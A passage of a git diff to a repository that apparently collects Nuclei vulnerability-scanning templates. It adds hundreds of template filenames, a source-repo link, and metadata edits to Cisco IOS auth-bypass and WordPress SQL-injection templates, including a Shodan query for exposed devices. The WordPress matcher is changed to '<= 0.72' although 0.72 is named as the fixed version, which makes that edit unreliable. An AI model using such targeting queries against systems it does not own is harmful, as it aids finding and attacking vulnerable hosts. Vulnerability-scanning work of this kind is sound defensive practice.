+| chatgpt_web.yaml | +| azure-policy-assignment-create-alert-missing.yaml | +| azure-storage-account-delete-unalerted.yaml | +| azure-servicebus-tls-version-outdated.yaml | +| azure-aks-rbac-unconfigured.yaml | +| azure-vm-performance-diagnostics-unenabled.yaml | +| azure-nsg-create-update-unalerted.yaml | +| azure-log-profile-all-activities.yaml | +| azure-postgres-log-checkpoints-disabled.yaml | +| azure-vm-accelerated-networking-not-enabled.yaml | +| xenmobile_server.yaml | +| activemq_apollo.yaml | +| peoplesoft_enterprise_peopletools.yaml | +| rg-uac.yaml | +| azure-vmss-zone-redundancy-missing.yaml | +| versa_operating_system.yaml | +| lucas-string-replace.yaml | +| hg532e.yaml | +| azure-keyvault-cert-transparency-missing.yaml | +| azure-mysql-db-update-unalerted.yaml | +| azure-vm-web-tier-disk-unencrypted.yaml | +| connection_broker.yaml | +| azure-appservice-ftps-only-not-enabled.yaml | +| azure-vm-poweroff-unalerted.yaml | +| azure-functionapp-appinsights-missing.yaml | +| beauty.yaml | +| raidenmaild.yaml | +| azure-appservice-backup-not-enabled.yaml | +| exit-notifier.yaml | +| tweaker5.yaml | +| azure-app-tier-cmk-untagged.yaml | +| azure-vm-byok-disk-volumes-not-enabled.yaml | +| azure-policy-assignment-delete-unalerted.yaml | +| secure-downloads.yaml | +| framework.yaml | +| turbomeeting.yaml | +| azure-openai-public-access-disabled.yaml | +| azure-sql-tde-cmk-not-used.yaml | +| azure-key-vault-delete-unalerted.yaml | +| azure-budget-alerts-missing.yaml | +| ranger.yaml | +| azure-postgresql-geo-backup-disabled.yaml | +| azure-nsg-rule-delete-unalerted.yaml | +| next-gen_application_firewall.yaml | +| hybris.yaml | +| calibre.yaml | +| azure-apim-system-assigned-identity-unconfigured.yaml | +| tinyfilemanager.yaml | +| azure-sql-delete-db-unalerted.yaml | +| azure-functionapp-user-assigned-id-missing.yaml | +| azure-vm-jit-access-not-enabled.yaml | +| azure-vm-boot-diagnostics-not-enabled.yaml | +| azure-network-watcher.yaml | +| azure-aks-entra-id-unintegrated.yaml | +| zentao.yaml | +| azure-appservice-ftp-deployment-disabled.yaml | +| CVE-2023-38992.yaml | diff --git a/data.json b/data.json index c804588914..ecf9000041 100644 --- a/data.json +++ b/data.json @@ -188,5 +188,6 @@ "2024-09-10": 41800, "2024-09-11": 41825, "2024-09-12": 41851, - "2024-09-13": 41783 + "2024-09-13": 41783, + "2024-09-14": 42206 } \ No newline at end of file diff --git a/data1.json b/data1.json index bfd9693414..4d69eb8110 100644 --- a/data1.json +++ b/data1.json @@ -49535,5 +49535,355 @@ "setPreferences-xss.yaml": "2024-09-13 02:22:33", "contact-form-7-plugin.yaml": "2024-09-13 02:22:33", "SquirrelMail.yaml": "2024-09-13 02:22:33", - "cve-2020-11547.yaml": "2024-09-13 02:22:33" + "cve-2020-11547.yaml": "2024-09-13 02:22:33", + "CVE-2024-8730.yaml": "2024-09-14 02:20:23", + "CVE-2024-7888.yaml": "2024-09-14 02:20:23", + "CVE-2024-5870.yaml": "2024-09-14 02:20:23", + "CVE-2024-8522.yaml": "2024-09-14 02:20:23", + "CVE-2024-3899.yaml": "2024-09-14 02:20:23", + "CVE-2024-45625.yaml": "2024-09-14 02:20:23", + "CVE-2024-5628.yaml": "2024-09-14 02:20:23", + "CVE-2024-8269.yaml": "2024-09-14 02:20:23", + "CVE-2024-6792.yaml": "2024-09-14 02:20:23", + "CVE-2024-8732.yaml": "2024-09-14 02:20:23", + "CVE-2024-6889.yaml": "2024-09-14 02:20:23", + "CVE-2024-45270.yaml": "2024-09-14 02:20:23", + "CVE-2024-8031.yaml": "2024-09-14 02:20:23", + "CVE-2024-7132.yaml": "2024-09-14 02:20:23", + "CVE-2024-8663.yaml": "2024-09-14 02:20:23", + "CVE-2024-7423.yaml": "2024-09-14 02:20:23", + "CVE-2024-6910.yaml": "2024-09-14 02:20:23", + "CVE-2024-8622.yaml": "2024-09-14 02:20:23", + "CVE-2024-8747.yaml": "2024-09-14 02:20:23", + "CVE-2024-6544.yaml": "2024-09-14 02:20:23", + "CVE-2024-8734.yaml": "2024-09-14 02:20:23", + "CVE-2024-7354.yaml": "2024-09-14 02:20:23", + "CVE-2024-8665.yaml": "2024-09-14 02:20:23", + "CVE-2024-8664.yaml": "2024-09-14 02:20:23", + "CVE-2024-37084.yaml": "2024-09-14 02:20:23", + "CVE-2024-8656.yaml": "2024-09-14 02:20:23", + "CVE-2024-7955.yaml": "2024-09-14 02:20:23", + "CVE-2024-8731.yaml": "2024-09-14 02:20:23", + "CVE-2024-6888.yaml": "2024-09-14 02:20:23", + "CVE-2024-5867.yaml": "2024-09-14 02:20:23", + "CVE-2024-7716.yaml": "2024-09-14 02:20:23", + "CVE-2024-45429.yaml": "2024-09-14 02:20:23", + "CVE-2024-45269.yaml": "2024-09-14 02:20:23", + "CVE-2024-5561.yaml": "2024-09-14 02:20:23", + "CVE-2024-41667.yaml": "2024-09-14 02:20:23", + "CVE-2024-5789.yaml": "2024-09-14 02:20:23", + "CVE-2024-8742.yaml": "2024-09-14 02:20:23", + "CVE-2024-7891.yaml": "2024-09-14 02:20:23", + "CVE-2024-8242.yaml": "2024-09-14 02:20:23", + "CVE-2024-3673.yaml": "2024-09-14 02:20:23", + "CVE-2024-8529.yaml": "2024-09-14 02:20:23", + "CVE-2024-23167.yaml": "2024-09-14 02:20:23", + "CVE-2024-5869.yaml": "2024-09-14 02:20:23", + "CVE-2024-5567.yaml": "2024-09-14 02:20:23", + "CVE-2024-8714.yaml": "2024-09-14 02:20:23", + "CVE-2024-5884.yaml": "2024-09-14 02:20:23", + "CVE-2024-6020.yaml": "2024-09-14 02:20:23", + "CVE-2024-8737.yaml": "2024-09-14 02:20:23", + "CVE-2022-2446.yaml": "2024-09-14 02:20:23", + "azure-postgres-log-connections-disabled.yaml": "2024-09-14 02:20:23", + "azure-apim-public-access-disabled.yaml": "2024-09-14 02:20:23", + "azure-sql-auditing-disabled.yaml": "2024-09-14 02:20:23", + "application_security_gateway.yaml": "2024-09-14 02:20:23", + "aruba_instant.yaml": "2024-09-14 02:20:23", + "jbpm.yaml": "2024-09-14 02:20:23", + "leira-roles.yaml": "2024-09-14 02:20:23", + "azure-storage-account-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-entra-id-guest-users-unmonitored.yaml": "2024-09-14 02:20:23", + "azure-storage-table-logging-disabled.yaml": "2024-09-14 02:20:23", + "azure-storage-overly-permissive-sap.yaml": "2024-09-14 02:20:23", + "azure-storage-private-endpoint-unconfigured.yaml": "2024-09-14 02:20:23", + "azure-keyvault-recoverability-unconfigured.yaml": "2024-09-14 02:20:23", + "vrealize_operations_manager.yaml": "2024-09-14 02:20:23", + "azure-vm-entra-id-unenabled.yaml": "2024-09-14 02:20:23", + "shopxo.yaml": "2024-09-14 02:20:23", + "azure-lb-create-update-missing.yaml": "2024-09-14 02:20:23", + "fortiportal.yaml": "2024-09-14 02:20:23", + "azure-sql-va-emails-unconfigured.yaml": "2024-09-14 02:20:23", + "azure-vm-delete-unalerted.yaml": "2024-09-14 02:20:23", + "bagisto.yaml": "2024-09-14 02:20:23", + "3cx.yaml": "2024-09-14 02:20:23", + "azure-postgres-connection-throttling-disabled.yaml": "2024-09-14 02:20:23", + "nifi.yaml": "2024-09-14 02:20:23", + "azure-functionapp-public-exposure.yaml": "2024-09-14 02:20:23", + "pelco_videoxpert.yaml": "2024-09-14 02:20:23", + "azure-postgresql-ssl-enforcement.yaml": "2024-09-14 02:20:23", + "azure-storage-queue-logging-disabled.yaml": "2024-09-14 02:20:23", + "hg255s.yaml": "2024-09-14 02:20:23", + "cloudstack.yaml": "2024-09-14 02:20:23", + "s14.yaml": "2024-09-14 02:20:23", + "azure-keyvault-network-unrestricted.yaml": "2024-09-14 02:20:23", + "office_anywhere.yaml": "2024-09-14 02:20:23", + "azure-vm-tags-schema-noncompliant.yaml": "2024-09-14 02:20:23", + "seeddms.yaml": "2024-09-14 02:20:23", + "azure-aks-kubernetes-version-outdated.yaml": "2024-09-14 02:20:23", + "azure-app-tier-vm-disk-unencrypted.yaml": "2024-09-14 02:20:23", + "hue.yaml": "2024-09-14 02:20:23", + "azure-appservice-auth-disabled.yaml": "2024-09-14 02:20:23", + "azure-vm-create-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-vm-deallocate-unalerted.yaml": "2024-09-14 02:20:23", + "flexnet_publisher.yaml": "2024-09-14 02:20:23", + "azure-redis-nonssl-port-disabled.yaml": "2024-09-14 02:20:23", + "azure-lb-unused.yaml": "2024-09-14 02:20:23", + "fumengyun-sqli.yaml": "2024-09-14 02:20:23", + "azure-diag-logs-not-enabled.yaml": "2024-09-14 02:20:23", + "froxlor.yaml": "2024-09-14 02:20:23", + "azure-sql-failover-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-keyvault-audit-not-enabled.yaml": "2024-09-14 02:20:23", + "tooljet.yaml": "2024-09-14 02:20:23", + "azure-appservice-always-on-disabled.yaml": "2024-09-14 02:20:23", + "azure-vm-ssh-auth-type.yaml": "2024-09-14 02:20:23", + "azure-vmss-auto-os-upgrade-missing.yaml": "2024-09-14 02:20:23", + "azure-openai-cmk-not-enabled.yaml": "2024-09-14 02:20:23", + "steve.yaml": "2024-09-14 02:20:23", + "azure-functionapp-access-keys-missing.yaml": "2024-09-14 02:20:23", + "wazuh.yaml": "2024-09-14 02:20:23", + "xnat.yaml": "2024-09-14 02:20:23", + "azure-blob-anonymous-access-disabled.yaml": "2024-09-14 02:20:23", + "azure-servicebus-public-access-disabled.yaml": "2024-09-14 02:20:23", + "logstash.yaml": "2024-09-14 02:20:23", + "azure-blob-soft-delete-disabled.yaml": "2024-09-14 02:20:23", + "azure-functionapp-admin-privileges.yaml": "2024-09-14 02:20:23", + "kio_firmware.yaml": "2024-09-14 02:20:23", + "azure-postgresql-db-delete-unalerted.yaml": "2024-09-14 02:20:23", + "azure-custom-admin-role-unrestricted.yaml": "2024-09-14 02:20:23", + "azure-delete-lb-alert-unconfigured.yaml": "2024-09-14 02:20:23", + "azure-vm-unmanaged-disk-volumes.yaml": "2024-09-14 02:20:23", + "data_science_studio.yaml": "2024-09-14 02:20:23", + "kiwi_tcms.yaml": "2024-09-14 02:20:23", + "azure-vm-managed-identity-unassigned.yaml": "2024-09-14 02:20:23", + "vrealize_operations.yaml": "2024-09-14 02:20:23", + "vpn.yaml": "2024-09-14 02:20:23", + "x-ui.yaml": "2024-09-14 02:20:23", + "netman_204_firmware.yaml": "2024-09-14 02:20:23", + "azure-public-ip-delete-unalerted.yaml": "2024-09-14 02:20:23", + "azure-keyvault-cert-keytype-unapproved.yaml": "2024-09-14 02:20:23", + "azure-vm-guest-diagnostics-unenabled.yaml": "2024-09-14 02:20:23", + "g0.yaml": "2024-09-14 02:20:23", + "azure-vmss-public-ip-disabled.yaml": "2024-09-14 02:20:23", + "t24.yaml": "2024-09-14 02:20:23", + "azure-vm-standard-ssd-required.yaml": "2024-09-14 02:20:23", + "kingsoft_antivirus.yaml": "2024-09-14 02:20:23", + "unified_communications_domain_manager.yaml": "2024-09-14 02:20:23", + "azure-search-service-managed-identity-disabled.yaml": "2024-09-14 02:20:23", + "azure-storage-min-tls-version.yaml": "2024-09-14 02:20:23", + "network_security_manager.yaml": "2024-09-14 02:20:23", + "ckan.yaml": "2024-09-14 02:20:23", + "vcenter_server.yaml": "2024-09-14 02:20:23", + "traccar.yaml": "2024-09-14 02:20:23", + "dns-320l.yaml": "2024-09-14 02:20:23", + "azure-custom-owner-role-unrestricted.yaml": "2024-09-14 02:20:23", + "azure-postgresql-db-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-apim-nv-plaintext-exposure.yaml": "2024-09-14 02:20:23", + "azure-keyvault-ssl-autorenewal-missing.yaml": "2024-09-14 02:20:23", + "email-obfuscate-shortcode.yaml": "2024-09-14 02:20:23", + "senayan_library_management_system.yaml": "2024-09-14 02:20:23", + "azure-appservice-http2-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-db-mysql-delete-unalerted.yaml": "2024-09-14 02:20:23", + "azure-postgres-log-duration-disabled.yaml": "2024-09-14 02:20:23", + "streampipes.yaml": "2024-09-14 02:20:23", + "websphere.yaml": "2024-09-14 02:20:23", + "azure-keyvault-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-redis-tls-version-outdated.yaml": "2024-09-14 02:20:23", + "clickshare_cs-100_huddle_firmware.yaml": "2024-09-14 02:20:23", + "rundeck.yaml": "2024-09-14 02:20:23", + "crmeb.yaml": "2024-09-14 02:20:23", + "remote_support.yaml": "2024-09-14 02:20:23", + "azure-vmss-auto-repairs-disabled.yaml": "2024-09-14 02:20:23", + "azure-appservice-remote-debugging-enabled.yaml": "2024-09-14 02:20:23", + "pdf-thumbnail-generator.yaml": "2024-09-14 02:20:23", + "azure-sql-tde-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-postgresql-storage-autogrow-disabled.yaml": "2024-09-14 02:20:23", + "azure-cosmosdb-auto-failover-missing.yaml": "2024-09-14 02:20:23", + "azure-aks-managed-identity-unassigned.yaml": "2024-09-14 02:20:23", + "azure-nsg-rule-update-unalerted.yaml": "2024-09-14 02:20:23", + "gnuboard5.yaml": "2024-09-14 02:20:23", + "sigma_wide.yaml": "2024-09-14 02:20:23", + "delicate.yaml": "2024-09-14 02:20:23", + "wechat.yaml": "2024-09-14 02:20:23", + "azure-cosmosdb-default-network-access-unrestricted.yaml": "2024-09-14 02:20:23", + "vec40g.yaml": "2024-09-14 02:20:23", + "azure-security-policy-update-unalerted.yaml": "2024-09-14 02:20:23", + "cs141.yaml": "2024-09-14 02:20:23", + "azure-sql-fw-rule-unalerted.yaml": "2024-09-14 02:20:23", + "webex_meetings_online.yaml": "2024-09-14 02:20:23", + "leira-cron-jobs.yaml": "2024-09-14 02:20:23", + "webpagetest.yaml": "2024-09-14 02:20:23", + "azure-appservice-client-cert-disabled.yaml": "2024-09-14 02:20:23", + "azure-appservice-insights-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-diagnostic-categories-misconfigured.yaml": "2024-09-14 02:20:23", + "azure-policy-not-allowed-types-unassigned.yaml": "2024-09-14 02:20:23", + "azure-blob-lifecycle-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-functionapp-system-assigned-missing.yaml": "2024-09-14 02:20:23", + "sangfor.yaml": "2024-09-14 02:20:23", + "azure-vmss-health-monitoring-missing.yaml": "2024-09-14 02:20:23", + "tamronos.yaml": "2024-09-14 02:20:23", + "aj-report.yaml": "2024-09-14 02:20:23", + "azure-aks-not-user-assigned.yaml": "2024-09-14 02:20:23", + "magnolia_cms.yaml": "2024-09-14 02:20:23", + "usg1000_firmware.yaml": "2024-09-14 02:20:23", + "azure-sql-mi-tls-version-outdated.yaml": "2024-09-14 02:20:23", + "azure-blob-immutable-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-postgres-log-disconnections-disabled.yaml": "2024-09-14 02:20:23", + "azure-security-solution-delete-unalerted.yaml": "2024-09-14 02:20:23", + "azure-security-solutions-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-blob-service-logging-disabled.yaml": "2024-09-14 02:20:23", + "telerik_report_server.yaml": "2024-09-14 02:20:23", + "azure-vm-endpoint-protection-missing.yaml": "2024-09-14 02:20:23", + "prison_management_system.yaml": "2024-09-14 02:20:23", + "azure-storage-trusted-access-disabled.yaml": "2024-09-14 02:20:23", + "azkaban.yaml": "2024-09-14 02:20:23", + "azure-keyvault-resource-lock-check.yaml": "2024-09-14 02:20:23", + "elfinder.yaml": "2024-09-14 02:20:23", + "cloud_foundation.yaml": "2024-09-14 02:20:23", + "azure-mfa-not-enabled-privileged-users.yaml": "2024-09-14 02:20:23", + "notebook.yaml": "2024-09-14 02:20:23", + "azure-synapse-sqlpool-tde-disabled.yaml": "2024-09-14 02:20:23", + "azure-storage-cmk-not-used.yaml": "2024-09-14 02:20:23", + "rg-uac_firmware.yaml": "2024-09-14 02:20:23", + "azure-public-ip-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-nic-ip-forwarding-check.yaml": "2024-09-14 02:20:23", + "azure-sql-db-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-storage-secure-transfer.yaml": "2024-09-14 02:20:23", + "azure-aks-api-version-not-latest.yaml": "2024-09-14 02:20:23", + "azure-vmss-termination-notif-disabled.yaml": "2024-09-14 02:20:23", + "office_web_apps_server.yaml": "2024-09-14 02:20:23", + "azure-aks-api-unrestricted.yaml": "2024-09-14 02:20:23", + "azure-database-tier-cmk-absent.yaml": "2024-09-14 02:20:23", + "azure-vm-unapproved-image.yaml": "2024-09-14 02:20:23", + "self_service.yaml": "2024-09-14 02:20:23", + "azure-vm-boot-disk-unencrypted.yaml": "2024-09-14 02:20:23", + "rt-n16.yaml": "2024-09-14 02:20:23", + "azure-storage-public-access.yaml": "2024-09-14 02:20:23", + "azure-vmss-empty-unattached.yaml": "2024-09-14 02:20:23", + "unifi_network_application.yaml": "2024-09-14 02:20:23", + "azure-apim-tls-config-weak.yaml": "2024-09-14 02:20:23", + "azure-apim-https-enforcement-missing.yaml": "2024-09-14 02:20:23", + "azure-sql-database-rename-unalerted.yaml": "2024-09-14 02:20:23", + "azure-postgres-allow-azure-services-disabled.yaml": "2024-09-14 02:20:23", + "experience_manager_cloud_service.yaml": "2024-09-14 02:20:23", + "azure-aks-cni-not-configured.yaml": "2024-09-14 02:20:23", + "azure-iam-role-resource-lock-unassigned.yaml": "2024-09-14 02:20:23", + "azure-storage-cross-tenant-replication-disabled.yaml": "2024-09-14 02:20:23", + "ollama.yaml": "2024-09-14 02:20:23", + "integrated_management_module.yaml": "2024-09-14 02:20:23", + "cdg.yaml": "2024-09-14 02:20:23", + "azure-aks-use-private-kv.yaml": "2024-09-14 02:20:23", + "azure-disk-encryption-unattached-volumes.yaml": "2024-09-14 02:20:23", + "wp-test-email.yaml": "2024-09-14 02:20:23", + "o2oa.yaml": "2024-09-14 02:20:23", + "azure-storage-blob-public-access.yaml": "2024-09-14 02:20:23", + "azure-appservice-backup-retention-missing.yaml": "2024-09-14 02:20:23", + "azure-vnet-ddos-protection.yaml": "2024-09-14 02:20:23", + "triton-lite.yaml": "2024-09-14 02:20:23", + "floating-contact.yaml": "2024-09-14 02:20:23", + "custom-post-limits.yaml": "2024-09-14 02:20:23", + "datahub.yaml": "2024-09-14 02:20:23", + "azure-storage-network-unrestricted.yaml": "2024-09-14 02:20:23", + "openmediavault.yaml": "2024-09-14 02:20:23", + "dzzoffice.yaml": "2024-09-14 02:20:23", + "scx-6555n.yaml": "2024-09-14 02:20:23", + "azure-defender-auto-provisioning-disabled.yaml": "2024-09-14 02:20:23", + "whatsup_gold.yaml": "2024-09-14 02:20:23", + "endpoint_protection_manager.yaml": "2024-09-14 02:20:23", + "cercopitheque.yaml": "2024-09-14 02:20:23", + "azure-storage-encryption-missing.yaml": "2024-09-14 02:20:23", + "azure-openai-private-endpoints-unconfigured.yaml": "2024-09-14 02:20:23", + "azure-vm-accelerated-networking-disabled.yaml": "2024-09-14 02:20:23", + "e-cology.yaml": "2024-09-14 02:20:23", + "manageengine_netflow_analyzer.yaml": "2024-09-14 02:20:23", + "azure-apim-http2-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-postgres-double-encryption-disabled.yaml": "2024-09-14 02:20:23", + "apeosport-v_c3375.yaml": "2024-09-14 02:20:23", + "azure-functionapp-vnet-integration-missing.yaml": "2024-09-14 02:20:23", + "azure-appservice-entra-id-missing.yaml": "2024-09-14 02:20:23", + "dir-845l.yaml": "2024-09-14 02:20:23", + "wn604.yaml": "2024-09-14 02:20:23", + "azure-apim-user-assigned-id-not-used.yaml": "2024-09-14 02:20:23", + "azure-keyvault-trusted-ms-unrestricted.yaml": "2024-09-14 02:20:23", + "karaf.yaml": "2024-09-14 02:20:23", + "azure-storage-static-website-review.yaml": "2024-09-14 02:20:23", + "azure-sql-mi-tde-cmk-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-storage-byok-not-used.yaml": "2024-09-14 02:20:23", + "azure-keyvault-certificate-insufficient-autorenew.yaml": "2024-09-14 02:20:23", + "neighborly.yaml": "2024-09-14 02:20:23", + "azure-appservice-tls-latest-version-missing.yaml": "2024-09-14 02:20:23", + "azure-appservice-https-only-not-enforced.yaml": "2024-09-14 02:20:23", + "argo_cd.yaml": "2024-09-14 02:20:23", + "azure-vmss-load-balancer-unassociated.yaml": "2024-09-14 02:20:23", + "azure-vm-trusted-launch-disabled.yaml": "2024-09-14 02:20:23", + "azure-monitor-diagnostic-unrestricted.yaml": "2024-09-14 02:20:23", + "azure-nsg-delete-unalerted.yaml": "2024-09-14 02:20:23", + "yeswiki.yaml": "2024-09-14 02:20:23", + "azure-aks-network-contrib-unassigned.yaml": "2024-09-14 02:20:23", + "azure-openai-managed-identity-not-used.yaml": "2024-09-14 02:20:23", + "camera_firmware.yaml": "2024-09-14 02:20:23", + "etl3100.yaml": "2024-09-14 02:20:23", + "voyager.yaml": "2024-09-14 02:20:23", + "aura_utility_services.yaml": "2024-09-14 02:20:23", + "openshift_origin.yaml": "2024-09-14 02:20:23", + "ns-asg.yaml": "2024-09-14 02:20:23", + "dataease.yaml": "2024-09-14 02:20:23", + "azure-apim-resource-logs-not-configured.yaml": "2024-09-14 02:20:23", + "chatgpt_web.yaml": "2024-09-14 02:20:23", + "azure-policy-assignment-create-alert-missing.yaml": "2024-09-14 02:20:23", + "azure-storage-account-delete-unalerted.yaml": "2024-09-14 02:20:23", + "azure-servicebus-tls-version-outdated.yaml": "2024-09-14 02:20:23", + "azure-aks-rbac-unconfigured.yaml": "2024-09-14 02:20:23", + "azure-vm-performance-diagnostics-unenabled.yaml": "2024-09-14 02:20:23", + "azure-nsg-create-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-log-profile-all-activities.yaml": "2024-09-14 02:20:23", + "azure-postgres-log-checkpoints-disabled.yaml": "2024-09-14 02:20:23", + "azure-vm-accelerated-networking-not-enabled.yaml": "2024-09-14 02:20:23", + "xenmobile_server.yaml": "2024-09-14 02:20:23", + "activemq_apollo.yaml": "2024-09-14 02:20:23", + "peoplesoft_enterprise_peopletools.yaml": "2024-09-14 02:20:23", + "rg-uac.yaml": "2024-09-14 02:20:23", + "azure-vmss-zone-redundancy-missing.yaml": "2024-09-14 02:20:23", + "versa_operating_system.yaml": "2024-09-14 02:20:23", + "lucas-string-replace.yaml": "2024-09-14 02:20:23", + "hg532e.yaml": "2024-09-14 02:20:23", + "azure-keyvault-cert-transparency-missing.yaml": "2024-09-14 02:20:23", + "azure-mysql-db-update-unalerted.yaml": "2024-09-14 02:20:23", + "azure-vm-web-tier-disk-unencrypted.yaml": "2024-09-14 02:20:23", + "connection_broker.yaml": "2024-09-14 02:20:23", + "azure-appservice-ftps-only-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-vm-poweroff-unalerted.yaml": "2024-09-14 02:20:23", + "azure-functionapp-appinsights-missing.yaml": "2024-09-14 02:20:23", + "beauty.yaml": "2024-09-14 02:20:23", + "raidenmaild.yaml": "2024-09-14 02:20:23", + "azure-appservice-backup-not-enabled.yaml": "2024-09-14 02:20:23", + "exit-notifier.yaml": "2024-09-14 02:20:23", + "tweaker5.yaml": "2024-09-14 02:20:23", + "azure-app-tier-cmk-untagged.yaml": "2024-09-14 02:20:23", + "azure-vm-byok-disk-volumes-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-policy-assignment-delete-unalerted.yaml": "2024-09-14 02:20:23", + "secure-downloads.yaml": "2024-09-14 02:20:23", + "framework.yaml": "2024-09-14 02:20:23", + "turbomeeting.yaml": "2024-09-14 02:20:23", + "azure-openai-public-access-disabled.yaml": "2024-09-14 02:20:23", + "azure-sql-tde-cmk-not-used.yaml": "2024-09-14 02:20:23", + "azure-key-vault-delete-unalerted.yaml": "2024-09-14 02:20:23", + "azure-budget-alerts-missing.yaml": "2024-09-14 02:20:23", + "ranger.yaml": "2024-09-14 02:20:23", + "azure-postgresql-geo-backup-disabled.yaml": "2024-09-14 02:20:23", + "azure-nsg-rule-delete-unalerted.yaml": "2024-09-14 02:20:23", + "next-gen_application_firewall.yaml": "2024-09-14 02:20:23", + "hybris.yaml": "2024-09-14 02:20:23", + "calibre.yaml": "2024-09-14 02:20:23", + "azure-apim-system-assigned-identity-unconfigured.yaml": "2024-09-14 02:20:23", + "tinyfilemanager.yaml": "2024-09-14 02:20:23", + "azure-sql-delete-db-unalerted.yaml": "2024-09-14 02:20:23", + "azure-functionapp-user-assigned-id-missing.yaml": "2024-09-14 02:20:23", + "azure-vm-jit-access-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-vm-boot-diagnostics-not-enabled.yaml": "2024-09-14 02:20:23", + "azure-network-watcher.yaml": "2024-09-14 02:20:23", + "azure-aks-entra-id-unintegrated.yaml": "2024-09-14 02:20:23", + "zentao.yaml": "2024-09-14 02:20:23", + "azure-appservice-ftp-deployment-disabled.yaml": "2024-09-14 02:20:23", + "CVE-2023-38992.yaml": "2024-09-14 02:20:23" } \ No newline at end of file diff --git a/links.csv b/links.csv index 34665a1981..5e1184f3e3 100644 --- a/links.csv +++ b/links.csv @@ -462,3 +462,4 @@ https://github.com/MuhammadWaseem29/Nuclei-templates-w https://github.com/Kennyslaboratory/Nuclei-Templates https://github.com/MuhammadWaseem29/Nuclei-templates-waseem https://github.com/machevalia/Custom-Nuclei-Templates +https://github.com/dat-ayush/custom-nuclei-templates diff --git a/nuclei-templates/CVE-2000/cve-2000-0114.yaml b/nuclei-templates/CVE-2000/CVE-2000-0114.yaml similarity index 100% rename from nuclei-templates/CVE-2000/cve-2000-0114.yaml rename to nuclei-templates/CVE-2000/CVE-2000-0114.yaml diff --git a/nuclei-templates/CVE-2001/CVE-2001-0537.yaml b/nuclei-templates/CVE-2001/CVE-2001-0537.yaml index 47e397a19a..57d6042605 100644 --- a/nuclei-templates/CVE-2001/CVE-2001-0537.yaml +++ b/nuclei-templates/CVE-2001/CVE-2001-0537.yaml @@ -6,25 +6,30 @@ info: severity: critical description: | HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the affected device. + remediation: | + Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software. reference: - https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/ - https://nvd.nist.gov/vuln/detail/CVE-2001-0537 - http://www.ciac.org/ciac/bulletins/l-106.shtml - https://exchange.xforce.ibmcloud.com/vulnerabilities/6749 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C cvss-score: 9.3 cve-id: CVE-2001-0537 cwe-id: CWE-287 - epss-score: 0.88063 + epss-score: 0.87683 + epss-percentile: 0.98569 cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* - epss-percentile: 0.9824 metadata: - max-request: 1 verified: true - shodan-query: product:"Cisco IOS http config" && 200 + max-request: 1 vendor: cisco product: ios + shodan-query: product:"Cisco IOS http config" && 200 tags: cve,cve2001,cisco,ios,auth-bypass http: @@ -45,3 +50,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502201530427f983f1ac47d92a3e00fb141fab33efd4f9ac109b29beca3488669ca5b022100e7ab1cc3fec5da235092a57848d0f83403d81bff12d5ed347ee7d6442b19444c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2001/CVE-2001-1473.yaml b/nuclei-templates/CVE-2001/cve-2001-1473.yaml similarity index 100% rename from nuclei-templates/CVE-2001/CVE-2001-1473.yaml rename to nuclei-templates/CVE-2001/cve-2001-1473.yaml diff --git a/nuclei-templates/CVE-2003/CVE-2003-1598.yaml b/nuclei-templates/CVE-2003/CVE-2003-1598.yaml index cadba79fcb..5e50e3a2b4 100644 --- a/nuclei-templates/CVE-2003/CVE-2003-1598.yaml +++ b/nuclei-templates/CVE-2003/CVE-2003-1598.yaml @@ -1,18 +1,14 @@ id: CVE-2003-1598 info: - name: "WordPress Core < 0.72 - SQL Injection" + name: > + WordPress Core < 0.72 - SQL Injection author: topscoder severity: high - description: "SQL injection vulnerability in log.header.php in WordPress 0.7 and earlier allows remote attackers to execute arbitrary SQL commands via the posts variable." + description: > + SQL injection vulnerability in log.header.php in WordPress 0.7 and earlier allows remote attackers to execute arbitrary SQL commands via the posts variable. reference: - - http://www.kernelpanik.org/docs/kernelpanik/wordpressadv.txt - - http://seclists.org/oss-sec/2012/q1/77 - - http://secunia.com/advisories/8954/ - - http://osvdb.org/show/osvdb/4610 - - http://www.securityfocus.com/bid/7784 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/12204 - - https://wordpress.org/news/2003/10/072-final-version-available/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0534bc03-5d7d-47fe-9c07-c9a61af38df2?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 @@ -36,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 0.72') - - compare_versions(version_by_js, '< 0.72') - - compare_versions(version_by_css, '< 0.72') + - compare_versions(version_by_generator, '<= 0.72') + - compare_versions(version_by_js, '<= 0.72') + - compare_versions(version_by_css, '<= 0.72') - type: status status: diff --git a/nuclei-templates/CVE-2003/CVE-2003-1599.yaml b/nuclei-templates/CVE-2003/CVE-2003-1599.yaml index 6c808c2278..c549c9eb77 100644 --- a/nuclei-templates/CVE-2003/CVE-2003-1599.yaml +++ 